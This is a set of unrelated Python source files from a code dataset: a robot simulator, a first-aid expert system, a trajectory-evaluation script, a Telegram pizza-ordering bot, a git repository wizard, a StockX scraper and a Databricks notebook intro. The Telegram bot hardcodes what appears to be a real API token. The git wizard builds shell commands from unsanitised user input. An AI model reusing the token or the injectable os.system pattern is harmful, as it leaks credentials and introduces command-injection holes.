handle)\n","sub_path":"golemapi/downtimes.py","file_name":"downtimes.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"475709957","text":"\n##################################################################################################################\n\"\"\"\nThis script contains the Volume class for all calculations relating to Volume\n\"\"\"\n\n# Libs\nimport numpy as np\n\n__version__ = '1.1.1'\n__author__ = 'Victor Guillet'\n__date__ = '29/11/2018'\n\n##################################################################################################################\n\n\nclass VOLUME:\n def __init__(self, big_data, amplification_factor=1):\n \"\"\"\n Calculate and generates amp_coef list based on volume to be used as an amplification signal\n\n :param big_data: BIGDATA class instance\n :param amplification_factor: Amplification factor of the signal\n \"\"\"\n from PhyTrade.Tools.MATH_tools import MATH_tools\n\n self.volume = np.array(big_data.data_slice.sliced_data[\"Volume\"])\n\n # Normalising volume signal values between 0 and 1\n self.amp_coef = MATH_tools().normalise_zero_one(self.volume)\n\n # Amplifying volume signal\n self.amp_coef = MATH_tools().amplify(self.amp_coef, amplification_factor)\n","sub_path":"PhyTrade/Economic_model/Technical_Analysis/Amplification_signals/Volume_gen.py","file_name":"Volume_gen.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"589353835","text":"from elements.map import Map\nfrom elements.obstacle import Obstacle\nfrom elements.robot import Robot\nfrom game.engine import Engine\nfrom game.engine_event import EngineEvent\nimport threading\n\n# App information\nVERSION = \"1.0\"\nROBOSIM_TITLE = \"RoboSim v.{} by Lukasz Zmudzinski | zmudzinski.me\".format(VERSION)\n\nclass RoboSim:\n def __init__(self, map, multipath=True, debug=False):\n # Information values\n self.start = False \n self.default_size = 30 # Keeps the default drawing size\n\n # Robosim values\n 
self.map = map \n self.robots = []\n self.obstacles = self.__create_obstacles() \n self.robot_start = None\n self.robot_goal = None\n\n # Debug values\n self.path = [] \n self.debug = debug\n self.multipath = multipath\n\n def __create_obstacles(self):\n \"\"\"Creates obstacle objects from map data\"\"\"\n result = []\n for row in range(0, self.map.dimensions[0]):\n for column in range(0, self.map.dimensions[1]):\n if self.map.generated_map[row][column] == 1:\n result.append(Obstacle(\n position=(self.default_size * row, self.default_size * column),\n size = (self.default_size, self.default_size)\n ))\n return result\n\n def __check_for_user_input(self):\n \"\"\"Checks for user input and returns False, when closing the app.\"\"\"\n for event in Engine.get_events():\n engine_event, value = Engine.get_robosim_event(event)\n if engine_event == EngineEvent.START:\n self.start = True\n if engine_event == EngineEvent.PAUSE:\n self.start = False\n if engine_event == EngineEvent.QUIT:\n return False\n\n if self.debug:\n if engine_event == EngineEvent.LEFT_CLICK:\n self.path.append(value)\n if engine_event == EngineEvent.RIGHT_CLICK:\n if len(self.path) > 0:\n # Create a new robot! Beep-Boop!\n robot = Robot(value)\n robot.path = self.path[:]\n if self.multipath:\n self.path = []\n self.robots.append(robot)\n else:\n if engine_event == EngineEvent.LEFT_CLICK: \n if self.robot_start is None:\n self.robot_start = value\n elif self.robot_goal is None:\n self.robot_goal = value\n\n return True\n\n def add_obstacle(self, obstacle):\n \"\"\"Adds an obstacle.\"\"\"\n self.obstacles.append(obstacle)\n\n def update_robots(self):\n for robot in self.robots:\n robot.update_position()\n\n def __go(self, title, size_mult):\n \"\"\"Runs the simulation.\"\"\" \n window_size = [self.map.dimensions[0] * self.default_size, self.map.dimensions[1] * self.default_size]\n screen, clock = Engine.start(window_size, title) \n pygame_running = True\n\n # Let's run this thing!\n while pygame_running:\n # Check for user input.\n pygame_running = self.__check_for_user_input()\n\n # Update robot positions\n if self.start:\n self.update_robots()\n\n # Draw stuff on the map\n Engine.draw(\n screen, self.obstacles, self.robots, \n self.path, self.robot_start, self.robot_goal\n )\n # Set framerate and update the screen.\n Engine.update_display(clock, 60)\n Engine.stop()\n\n\n def run(self, title=ROBOSIM_TITLE, size_mult=20):\n \"\"\"Starts the simulation in a thread.\"\"\"\n t = threading.Thread(target=self.__go, args=(title, size_mult))\n t.start()\n","sub_path":"robosim.py","file_name":"robosim.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"347388941","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 20 10:15:17 2019\n\n@author: johna\n\"\"\"\nfrom easygui import *\nfrom pyDatalog import pyDatalog\n\n\ndef infos_secours():\n msg = \"Informations a transmettre au secours\"\n title = \"Application de secourisme\"\n fields = (\"Nom\",\"Lieu de la victime\",\"Nombre de victimes\",\"Etat de la ou des victimes\",\"Les obstacles potentiels pour le transport des victimes\")\n mes_choix = multenterbox(msg, title, fields)\n return mes_choix\n\ndef infos_victime():\n msg = \"Informations a transmettre au secours\"\n title = \"Application de secourisme\"\n fields = (\"Description et localisation des symptomes\",\"Quantifier la douleur (1 a 10)\",\"Qualifier la douleur(brulure,lourdeur,etc..)\")\n mes_choix = multenterbox(msg, 
title, fields)\n symptomes = mes_choix\n\n msg = \"Demandez à la victime si elle est allergique à certains médicaments ou aliments.\"\n title = \"Application de secourisme\"\n fields = (\"\")\n mes_choix = textbox(msg, title, fields)\n allergie = mes_choix\n\n msg = \"Est-ce que la victime prend des medicaments\"\n title = \"Application de secourisme\"\n choices = (\"Oui\",\"Non\")\n type_choice = choicebox(msg, title, choices)\n\n if(type_choice == \"Oui\"):\n msg = \"Lesquels ?\"\n title = \"Application de secourisme\"\n fields = (\"\")\n mes_choix = textbox(msg, title, fields)\n medicaments = mes_choix\n \n msg = \"Informations a transmettre au secours\"\n title = \"Application de secourisme\"\n fields = (\"Probleme de sante/Historique medical\",\"Rentre-t-elle d’un voyage ? Depuis moins de 3 semaines ?\")\n mes_choix = multenterbox(msg, title, fields)\n passe_medical = mes_choix\n \n msg = \"Demandez à la victime quelle était l’heure de son dernier repas, la quantité ingérée ainsi que ce qu’elle a mangé.\"\n title = \"Application de secourisme\"\n fields = (\"\")\n mes_choix = textbox(msg, title, fields)\n repas = mes_choix\n \n msg = \"Demandez à la victime ce qui s’est passé au moment de l'accident et ce qu'elle faisait à ce moment précis.\"\n title = \"Application de secourisme\"\n fields = (\"\")\n mes_choix = textbox(msg, title, fields)\n evenement = mes_choix\n \n\npyDatalog.clear()\npyDatalog.create_terms(\"X,Y,Identification\")\npyDatalog.create_terms(\"Electrique\",\"Physique\")\npyDatalog.create_terms(\"Chaleur\",\"Asphyxie\")\npyDatalog.create_terms(\"suppression_danger\",\"balisage_zone\",\"evacuation_urgence\")\n\nIdentification(X) <= Electrique(X)\nIdentification(X) <= Physique(X)\n\nElectrique(X) <= Asphyxie(X)\nPhysique(X) <= Chaleur(X)\n\n+Chaleur(suppression_danger)\n+Chaleur(balisage_zone)\n+Chaleur(evacuation_urgence)\n\n\n+Asphyxie(suppression_danger)\n+Asphyxie(balisage_zone)\n+Asphyxie(evacuation_urgence)\n\nprint(Identification(X))\n\n","sub_path":"Documents/Ynov/Cours/Artificial Intelligence/partiel/systeme_expert_christopher_pulvaldady.py","file_name":"systeme_expert_christopher_pulvaldady.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"296413849","text":"import numpy as np\nfrom functools import partial\nimport pandas as pd\nimport time\nimport os\nimport utils as ut\nimport model as mo\nimport adapters as ad\n\n\nclass Predictor(object):\n\n def __init__(self, save_name, n_obs, n_preds, batch_df2input_fcn, predict,\n raw_pred2pred, validate_batch=None):\n self.save_name = save_name\n self.n_obs = n_obs\n self.n_preds = n_preds\n self.batch_df2input_fcn = batch_df2input_fcn\n self.predict = predict\n self.raw_pred2pred = raw_pred2pred\n self.validate_batch = validate_batch\n\n\ndef get_sgan_predictor(method_name, test_dataset, dataset_split, make_pred_fcn=None):\n \"\"\"\n \n :param method_name: \n :param test_dataset: \n :param dataset_split: \n :param make_pred_fcn: (n_samples, model_path) -> pred_fcn\n - pred_fcn: (abs_xy, rel_xy, seq_start_end) -> sampled prediction list\n - prediction list[i] = n_preds, n_peds, 2 | list of sampled predictions\n :return: \n \"\"\"\n model_path = os.path.join(ut.MODELS_ROOT, '{}/{}/{}.pt'.format(method_name, dataset_split, test_dataset))\n print(model_path)\n n_samples = 100\n n_obs = 8\n n_preds = 8\n batch_df2input_fcn = partial(ad.batch_df2batch, n_obs=n_obs)\n predict_fcn = make_pred_fcn(n_samples, model_path)\n 
raw_pred2pred = partial(ad.raw_pred2df, tform=np.eye(3))\n save_name = 'SGAN_{}_{}'.format(n_samples, test_dataset)\n predictor = Predictor(save_name, n_obs, n_preds,\n batch_df2input_fcn, predict_fcn, raw_pred2pred)\n return predictor\n\n\ndef main():\n methods = [\n (mo.ModelType(is_large=True, is_sd_s=True, is_sd_p=True).get_name(), get_sgan_predictor),\n ]\n dataset_names = [\n # 'eth',\n # 'hotel',\n # 'zara',\n 'univ',\n ]\n dataset_split = 'split_1.0_0'\n # dataset_split = 'split_0.2_2'\n is_evaluate_cross = False\n is_skip_if_exists = False\n is_display = False\n is_test_on_all = True\n\n dataset2gt_name = {\n 'eth': 'batches_eth_test',\n 'hotel': 'batches_hotel_test',\n 'zara': 'batches_zara_test',\n 'univ': 'batches_univ_test',\n }\n for method_name, get_predictor in methods:\n for train_dataset in dataset_names:\n for test_dataset in dataset_names:\n if train_dataset != test_dataset and not is_evaluate_cross:\n continue\n try:\n predictor = get_predictor(\n method_name, test_dataset, dataset_split)\n except FileNotFoundError as e:\n print(e)\n continue\n print('Evaluating: {} {} {}'.format(\n method_name, train_dataset, test_dataset, dataset_split))\n save_path = os.path.join(\n ut.RESULTS_ROOT,\n method_name,\n test_dataset,\n dataset_split,\n predictor.save_name + '.csv'\n )\n print('saving to {}'.format(save_path))\n if is_skip_if_exists and os.path.exists(save_path):\n print(': file exists -> skipping')\n continue\n results_df = evaluate(predictor, test_dataset, dataset_split,\n dataset2gt_name,\n is_display=is_display, is_test_on_all=is_test_on_all)\n\n print(save_path)\n ut.mkdir_p(os.path.dirname(save_path))\n results_df.to_csv(save_path, index=False, sep=' ')\n\n\ndef evaluate(predictor, test_dataset, dataset_split, dataset2gt_name,\n is_display=False, is_test_on_all=False):\n from metrics import evaluate_expected_distance_xy, evaluate_min_distance_xy\n\n gt_name = dataset2gt_name[test_dataset]\n if is_test_on_all:\n batches_df_path = os.path.join(ut.DATASETS_ROOT, 'split_1.0_0', 'batches', gt_name + '.csv')\n else:\n batches_df_path = os.path.join(ut.DATASETS_ROOT, dataset_split, 'batches', gt_name + '.csv')\n n_obs = predictor.n_obs\n n_preds = predictor.n_preds\n scale = 1.\n\n # --\n if is_display:\n from display import display_xy_predictions_vs_gt\n import matplotlib\n matplotlib.use('TkAgg')\n import matplotlib.pyplot as plt\n fig, ax = plt.subplots()\n ax = fig.gca()\n plt.grid(True)\n t2pred_xyp = {i: [] for i in range(n_preds)}\n t2gt_xy_list = {i: [] for i in range(n_preds)}\n is_gt_linear_list = []\n cdf_bin_edges = np.arange(0, 20., .05)\n t2cdf_bin_counts = {i: np.zeros((cdf_bin_edges.size-1,), dtype=np.int) for i in range(n_preds)}\n distance_quantiles = np.arange(0.01, 1., .01)\n t2distance_quantile_values = {i: np.zeros((distance_quantiles.size,), dtype=np.float) for i in range(n_preds)}\n batches_df = pd.read_csv(batches_df_path, sep=' ', header=0) # dc.load_dataframe(batches_df_path)\n batches_df = batches_df[batches_df['agent_type'] != 1] # no vehicles\n batches_inds = np.unique(np.sort(batches_df['batch_ind']))\n skip = get_skip(batches_df[batches_df['batch_ind'] == batches_inds[0]])\n max_obs = 8\n time_elapsed = 0\n n_peds_evaluated = 0\n for batch_ind in batches_inds:\n batch_df = batches_df[batches_df['batch_ind'] == batch_ind]\n t = int(batch_df['t'].min())\n t_obs0 = t+(max_obs-n_obs)*skip\n t_pred0 = t+max_obs*skip\n t_end = t+(max_obs+n_preds)*skip\n # evaluated agents must be present in every frame\n obs_df = 
batch_df[batch_df['t'].isin(range(t_obs0, t_pred0))]\n evaluate_ids, evaluate_inds = get_eval_agents(batch_df, obs_df, 16, t_end)\n if len(evaluate_ids) == 0:\n # print(batch_ind)\n continue\n\n predictor_input = predictor.batch_df2input_fcn(obs_df, evaluate_ids)\n start_time = time.time()\n y_raw_pred = predictor.predict(*predictor_input)\n time_elapsed += time.time() - start_time\n y_pred_df = predictor.raw_pred2pred(y_raw_pred, evaluate_ids, evaluate_inds)\n\n print(batch_ind, len(evaluate_ids))\n if is_display:\n print(batch_ind)\n title_str = 'batch {}: '.format(batch_ind) + 't = {}, agent = {}'\n display_xy_predictions_vs_gt(\n ax, batch_df, y_pred_df, max_obs, evaluate_ids,\n pause=0.5, max_step=8, title_str=title_str,\n xlim=[-10, 20], ylim=[-10, 20])\n\n n_peds_evaluated += len(evaluate_ids)\n for j in range(len(evaluate_ids)):\n for i in range(n_preds):\n t_ind = t_pred0 + i*skip if 'Simulator' in predictor.save_name else i\n t2pred_xyp[i].append(\n y_pred_df[(y_pred_df['t'] == t_ind) &\n (y_pred_df['agent_id'] == evaluate_ids[j])][['x', 'y', 'p']].values\n )\n gt_t_df = batch_df[(batch_df['t'] == t_pred0 + i*skip) &\n (batch_df['agent_id'] == evaluate_ids[j])]\n # assert gt_t_df.shape[0] > 0\n t2gt_xy_list[i].append(gt_t_df[['x', 'y']].values)\n # distance cdf\n distances = np.sqrt(((t2pred_xyp[i][-1][:, :2] - t2gt_xy_list[i][-1])**2).sum(axis=1))\n t2cdf_bin_counts[i] += np.histogram(distances, bins=cdf_bin_edges)[0]\n assert distances.max() < cdf_bin_edges[-1]\n # distance quantiles\n t2distance_quantile_values[i] += np.percentile(distances, distance_quantiles*100, interpolation='lower')\n\n obs_df_j = batch_df[(batch_df['t'].isin(range(t_obs0, t_pred0))) & (batch_df['agent_id'] == evaluate_ids[j])]\n gt_df_j = batch_df[(batch_df['t'].isin(range(t_pred0, t_end))) & (batch_df['agent_id'] == evaluate_ids[j])]\n is_gt_linear_list.append(is_trajectory_linear(obs_df_j, gt_df_j, n_preds))\n # wdist(t) = ADE(t)\n eval_metrics = {name: [] for name in [\n 'wdist', 'Min_dist_0.01', 'wdist_linear', 'wdist_nonlinear',\n 'Min_dist_0.01_linear', 'Min_dist_0.01_nonlinear', 'dist_cdf',\n 'dist_quantile'\n ]}\n for i in range(n_preds):\n print('\\nTime t={} stats'.format(i+1))\n wdist = np.array([evaluate_expected_distance_xy(pred_xy, gt_xy)\n for pred_xy, gt_xy\n in zip(t2pred_xyp[i], t2gt_xy_list[i])])\n wdist = wdist[~np.isnan(wdist)]/scale\n print('wdist {:.2f}'.format(np.mean(wdist)))\n eval_metrics['wdist'].append(np.mean(wdist))\n\n wdist = np.array([evaluate_min_distance_xy(\n pred_xy, gt_xy, 0)\n for pred_xy, gt_xy\n in zip(t2pred_xyp[i], t2gt_xy_list[i])])\n wdist = wdist[~np.isnan(wdist)]/scale\n print('min dist_0.01 {:.2f}'.format(np.mean(wdist)))\n eval_metrics['Min_dist_0.01'].append(np.mean(wdist))\n\n # avg-linear/nonlinear\n wdist = np.array([evaluate_expected_distance_xy(pred_xy, gt_xy)\n for pred_xy, gt_xy, is_linear\n in zip(t2pred_xyp[i], t2gt_xy_list[i], is_gt_linear_list) if is_linear])\n wdist = wdist[~np.isnan(wdist)] / scale\n print('wdist_linear {:.2f}'.format(np.mean(wdist)))\n eval_metrics['wdist_linear'].append(np.mean(wdist))\n wdist = np.array([evaluate_expected_distance_xy(pred_xy, gt_xy)\n for pred_xy, gt_xy, is_linear\n in zip(t2pred_xyp[i], t2gt_xy_list[i], is_gt_linear_list) if ~is_linear])\n wdist = wdist[~np.isnan(wdist)] / scale\n print('wdist_nonlinear {:.2f}'.format(np.mean(wdist)))\n eval_metrics['wdist_nonlinear'].append(np.mean(wdist))\n\n # min-linear/nonlinear\n wdist = np.array([evaluate_min_distance_xy(\n pred_xy, gt_xy, 0)\n for pred_xy, gt_xy, 
is_linear\n in zip(t2pred_xyp[i], t2gt_xy_list[i], is_gt_linear_list) if is_linear])\n wdist = wdist[~np.isnan(wdist)] / scale\n print('min dist_0.01_linear {:.2f}'.format(np.mean(wdist)))\n eval_metrics['Min_dist_0.01_linear'].append(np.mean(wdist))\n wdist = np.array([evaluate_min_distance_xy(\n pred_xy, gt_xy, 0)\n for pred_xy, gt_xy, is_linear\n in zip(t2pred_xyp[i], t2gt_xy_list[i], is_gt_linear_list) if ~is_linear])\n wdist = wdist[~np.isnan(wdist)] / scale\n print('min dist_0.01_nonlinear {:.2f}'.format(np.mean(wdist)))\n eval_metrics['Min_dist_0.01_nonlinear'].append(np.mean(wdist))\n\n # distance cdf\n eval_metrics['dist_cdf'].append(np.array2string(t2cdf_bin_counts[i], threshold=10000000))\n print(len(np.array2string(t2cdf_bin_counts[i])), 'dist cdf length')\n\n # dist_quantile plot\n t2distance_quantile_values[i] /= float(n_peds_evaluated)\n eval_metrics['dist_quantile'].append(np.array2string(t2distance_quantile_values[i], threshold=10000000))\n\n n_steps_predicted = len(batches_inds) * n_preds\n average_prediction_time = time_elapsed / n_steps_predicted\n print('Average prediction time {:.8f}s'.format(average_prediction_time))\n eval_metrics['Time'] = [average_prediction_time] * len(eval_metrics[list(eval_metrics.keys())[0]])\n\n eval_df = pd.DataFrame.from_dict(eval_metrics)\n pd.set_option('display.max_colwidth', -1)\n return eval_df\n\n\ndef get_skip(batch_df):\n \"\"\"\n\n :param batch_df: \n :return: skip: 1 = no skip, 2 = every other frame skipped\n :rtype int\n \"\"\"\n t_inds = np.unique(np.sort(batch_df['t'].values))\n return int(t_inds[1] - t_inds[0])\n\n\ndef get_eval_agents(df, obs_df, n_frames, t_max):\n # only eval on agents present in all n_frames of observations+pred\n # - for indexing, based on obs_df\n agent_ids = np.sort(obs_df['agent_id'].unique())\n evaluate_ids = []\n evaluate_inds = []\n for i, agent_id in enumerate(agent_ids):\n n_present = df[(df['agent_id'] == agent_id) &\n (df['t'] < t_max)].shape[0]\n if n_frames == n_present:\n evaluate_ids.append(agent_id)\n evaluate_inds.append(i)\n return evaluate_ids, evaluate_inds\n\n\ndef is_trajectory_linear(obs_df, gt_df, n_preds):\n xy = obs_df[['x', 'y']].values\n xp = np.mean(xy[1:, 0] - xy[:-1, 0]) * np.arange(1, n_preds + 1) + xy[-1, 0]\n yp = np.mean(xy[1:, 1] - xy[:-1, 1]) * np.arange(1, n_preds + 1) + xy[-1, 1]\n pred_xy = np.array([xp, yp]).T\n diff = (pred_xy - gt_df[['x', 'y']].values)**2\n rmse = np.sqrt(np.sum(diff)/n_preds) # in meters\n return rmse < 0.5\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"evaluate_split.py","file_name":"evaluate_split.py","file_ext":"py","file_size_in_byte":12645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"52372433","text":"import telebot\r\nimport json\r\nfrom telebot import types\r\n\r\nsavatx = {}\r\nsavat1 = []\r\nc = {}\r\nbot = telebot.TeleBot(\"1340272262:AAH3XgBU08irFeU5t5529P3YMb-QIHhEhG0\")\r\n\r\n\r\ndef ruscha_otvet(message):\r\n bot.reply_to(message, \"ВЫ ВЫБИРАЛИ РУССКОГО ЯЗЫКА! 
🇷🇺\")\r\n\r\n\r\ndef rus_knopkalari(message):\r\n rus_knopkalari = types.ReplyKeyboardMarkup(row_width=2, resize_keyboard=True)\r\n knopka1 = types.KeyboardButton(\"Заказать 🥡\")\r\n knopka2 = types.KeyboardButton(\"Параметры ⚙️\")\r\n knopka3 = types.KeyboardButton(\"Оставить комментарий 📝\")\r\n knopka4 = types.KeyboardButton(\"Назад ◀️\")\r\n rus_knopkalari.add(knopka1, knopka2, knopka3, knopka4)\r\n bot.send_message(message.from_user.id, \"ВЫБЕРИТЕ ОДНУ ИЗ КАТЕГОРИЙ!\", reply_markup=rus_knopkalari)\r\n\r\n\r\ndef pizzi(message):\r\n print(message)\r\n pizza_knopka = types.ReplyKeyboardMarkup(row_width=3, resize_keyboard=True)\r\n pizza_1 = types.KeyboardButton(\"КОМБО ПИЦЦА 🏵\")\r\n pizza_2 = types.KeyboardButton(\"ПИЦЦА ШАШЛЫК ️🍢\")\r\n pizza_3 = types.KeyboardButton(\"КУРИННАЯ БАРБЕКЮ 🐥\")\r\n pizza_4 = types.KeyboardButton(\"НАЗАД 🔙\")\r\n pizza_5 = types.KeyboardButton(\"ПОСМОТРЕТЬ КОРЗИНУ 🗑\")\r\n pizza_knopka.add(pizza_1, pizza_2, pizza_3, pizza_4, pizza_5)\r\n bot.send_message(message.from_user.id, \"ПИЦЦА ЖДУТ ВАС! ☺☺️☺️☺️\", reply_markup=pizza_knopka)\r\n\r\ndef soni_rus(message):\r\n nomeri_rus = types.InlineKeyboardMarkup(row_width=3)\r\n nomer_1 = types.InlineKeyboardButton(text=\"1\", callback_data=\"odin\")\r\n nomer_2 = types.InlineKeyboardButton(text=\"2\", callback_data=\"dva\")\r\n nomer_3 = types.InlineKeyboardButton(text=\"3\", callback_data=\"tri\")\r\n nomer_4 = types.InlineKeyboardButton(text=\"4\", callback_data=\"chetiri\")\r\n nomer_5 = types.InlineKeyboardButton(text=\"5\", callback_data=\"pyat\")\r\n nomer_6 = types.InlineKeyboardButton(text=\"6\", callback_data=\"shest\")\r\n nomer_7 = types.InlineKeyboardButton(text=\"7\", callback_data=\"sem\")\r\n nomer_8 = types.InlineKeyboardButton(text=\"8\", callback_data=\"vosem\")\r\n nomer_9 = types.InlineKeyboardButton(text=\"9\", callback_data=\"devet\")\r\n nomeri_rus.add(nomer_1, nomer_2, nomer_3, nomer_4, nomer_5, nomer_6, nomer_7, nomer_8, nomer_9)\r\n bot.send_message(message.from_user.id, text=\"ВЫБЕРИТЕ КОЛИЧЕСТВУ!\", reply_markup=nomeri_rus)\r\n\r\ndef parametri(message):\r\n db = get_db()\r\n if db:\r\n for user in db:\r\n try:\r\n if user['user_id'] == message.from_user.id:\r\n ID = user['user_id']\r\n ISMI = user['first_name']\r\n NOMERI = user['tel_number']\r\n # QUESTION=str(ISMI)+str(ID)+str(NOMERI)\r\n INFO = \"ВАШЕ ИМЯ: \" + str(ISMI) + '\\n' + \"ВАШ ID: \" + str(\r\n ID) + '\\n' + \"ВАШ НОМЕР: \" + str(NOMERI)\r\n print(ID, ISMI, NOMERI)\r\n bot.send_message(message.from_user.id, INFO)\r\n except KeyError:\r\n return None\r\n\r\n\r\ndef get_db():\r\n with open('data.json', 'r') as f:\r\n return json.load(f)\r\n\r\n\r\ndef get_user_from_db(user_id):\r\n db = get_db()\r\n if db:\r\n for user in db:\r\n try:\r\n if user['user_id'] == user_id:\r\n return user_id\r\n except KeyError:\r\n return None\r\n return None\r\n\r\n\r\ndef set_user_to_db(user_id, first_name, tel_number):\r\n db = get_db()\r\n data = {'user_id': user_id, 'first_name': first_name, 'tel_number': tel_number}\r\n db.append(data)\r\n with open('data.json', 'w+') as f:\r\n json.dump(db, f)\r\n","sub_path":"RUSSIAN.py","file_name":"RUSSIAN.py","file_ext":"py","file_size_in_byte":3795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"24106519","text":"#!/usr/bin/env python\n# William Wu, 2013-06-26\nimport os, sys, datetime, getopt, subprocess\n\n# parameters\nauthor_name = \"William Wu\"\ntime_fmt = \"%Y-%m-%d %H:%M\"\n\n# usage\ndef usage():\n print('Usage:\\n\\t%s' % 
sys.argv[0])\n print('Synopsis:')\n print('\\tGenerates bare git repository with e-mail hooks enabled.')\n\n# main method\ndef main(argv):\n \n # defaults\n prompts_flag = True\n directory_name = \"project.git\"\n project_description = \"project\"\n email_addresses = [\"foobar@baz.com\"]\n \n # command-line argument parsing\n try:\n opts, args = getopt.gnu_getopt(argv, \"fh\", [\"fast\",\"help\"])\n except getopt.GetoptError:\n usage()\n sys.exit(2)\n for opt, arg in opts:\n if opt in (\"-h\", \"--help\"):\n usage()\n sys.exit()\n elif opt in (\"-f\", \"--fast\"):\n prompts_flag = False\n \n # gather parameters from user\n if prompts_flag: \n directory_name = raw_input(\"Enter directory name: \").strip()\n project_description = raw_input(\"Enter project description: \").strip()\n email_addresses = raw_input(\"Enter e-mail addresses of developers, separated by spaces: \").split()\n\n # construct git repository\n os.system(\"mkdir %s\" % directory_name)\n os.chdir(directory_name)\n process = subprocess.Popen(['git', 'init', '--bare'], shell=False, stdout=subprocess.PIPE)\n process.communicate()\n os.system(\"git config hooks.mailinglist \\\"%s\\\"\" % (\", \".join(email_addresses)) )\n os.system(\"git config hooks.emailprefix \\\"[git] \\\"\")\n os.system(\"echo '(%s) ' > description\" % project_description )\n os.chdir(\"hooks\")\n os.system(\"sed -e \\\"s/#\\. /. /g\\\" post-receive.sample > post-receive\")\n os.system(\"chmod 775 post-receive\")\n\n\n# invoke main\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"git-bare-wizard.py","file_name":"git-bare-wizard.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"322117741","text":"import requests\nfrom bs4 import BeautifulSoup\n\nclass Item:\n def __init__(self, link):\n self.soup = BeautifulSoup(requests.get(link).text,\n features=\"html.parser\")\n self.name = self.soup.find('h1', {'class' : 'name'}).text\n self.sale = self.soup.find('div',{'class' : 'sale-value'}).text\n self.sale_size = self.soup.find('div', {'class' : 'last-sale-block'}\n ).find('div',\n {'class' : 'size-container'}).text\n self.sale_full = self.soup.find('div',{'class' : 'last-sale'}).text\n self.low = self.soup.find('div', {'class' : 'bid bid-button-b'}).find(\n 'div', {'class' : 'stat-value stat-small'}).text\n self.low_size = self.soup.find('div', {'class' : 'bid bid-button-b'}\n ).find('div',\n {'class' : 'size-container'}).text\n self.high = self.soup.find('div', {'class' : 'ask ask-button-b'}).find(\n 'div', {'class' : 'stat-value stat-small'}).text\n self.high_size = self.soup.find('div', {'class' : 'ask ask-button-b'}\n ).find('div',\n {'class' : 'size-container'}).text\n\n\n\nif __name__ == '__main__':\n\titem1 = Item('https://stockx.com/adidas-yeezy-boost-350-v2-static')\n\titem2 = Item('https://stockx.com/adidas-yeezy-boost-350-v2-cream-white')\n\titem3 = Item('https://stockx.com/adidas-yeezy-boost-350-v2-white-core-black-red')\n\titem4 = Item('https://stockx.com/adidas-yeezy-boost-350-v2-beluga-2-0')\n\titems = [item1, item2, item3, item4]\n\n\tfor x in items:\n\t print(x.name)\n\t print(\"Last Sale: \" + x.sale + \", for a \" + x.sale_size)\n\t #print(item1.sale_full)\n\t print(\"Lowest Ask: \" + x.low + \", for a \" + x.low_size)\n\t print(\"Highest Bid: \" + x.high + \", for a \" + x.high_size + 
\"\\n\")\n\n\n\n\n\n","sub_path":"app/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"471390155","text":"# Databricks notebook source\n# MAGIC %md\n# MAGIC # Tutorial MLOps\n# MAGIC \n# MAGIC This is a redefined notebook made available on a webinar hosted by Databricks, going through the whole pipeline of MLOps using delta lakes and model serving. You can watch the webinar [here](https://databricks.com/p/thank-you/webinar-operationalizing-machine-learning-at-scale-140431) (approx. 1h40m - this notebook demo starts after approx. 30 minutes). \n# MAGIC \n# MAGIC _Thanks to [Christian von Koch](https://www.linkedin.com/in/christianvonkoch/) and [William Anzén](https://www.linkedin.com/in/william-anz%C3%A9n-b52003199/) for their contributions towards making these materials work on this particular Databricks Shard_.\n# MAGIC \n# MAGIC **Note**: The steps for uploading data on the Databricks Shard can be found in the end of this notebook. The steps below starts from a point where the data is already uploaded to the Databricks Shard.\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC # From X-rays to a Production Classifier with MLflow\n# MAGIC \n# MAGIC This simple example will demonstrate how to build a chest X-Ray classifer with PyTorch Lightning, and explain its output, but more importantly, will demonstrate how to manage the model's deployment to production as a REST service with MLflow and its Model Registry.\n# MAGIC \n# MAGIC \n# MAGIC \n# MAGIC The National Institute of Health (NIH) [released a dataset](https://www.nih.gov/news-events/news-releases/nih-clinical-center-provides-one-largest-publicly-available-chest-x-ray-datasets-scientific-community) of 45,000 chest X-rays of patients who may suffer from some problem in the chest cavity, along with several of 14 possible diagnoses. This was accompanied by a [paper](https://openaccess.thecvf.com/content_cvpr_2017/papers/Wang_ChestX-ray8_Hospital-Scale_Chest_CVPR_2017_paper.pdf) analyzing the data set and presenting a classification model.\n# MAGIC \n# MAGIC The task here is to train a classifier that learns to predict these diagnoses. Note that each image may have 0 or several 'labels'. This data set was the subject of a [Kaggle competition](https://www.kaggle.com/nih-chest-xrays/data) as well.\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Data Engineering\n# MAGIC \n# MAGIC The image data is provided as a series of [compressed archives](https://nihcc.app.box.com/v/ChestXray-NIHCC). However they are also available [from Kaggle](https://www.kaggle.com/nih-chest-xrays/data) with other useful information, like labels and bounding boxes. 
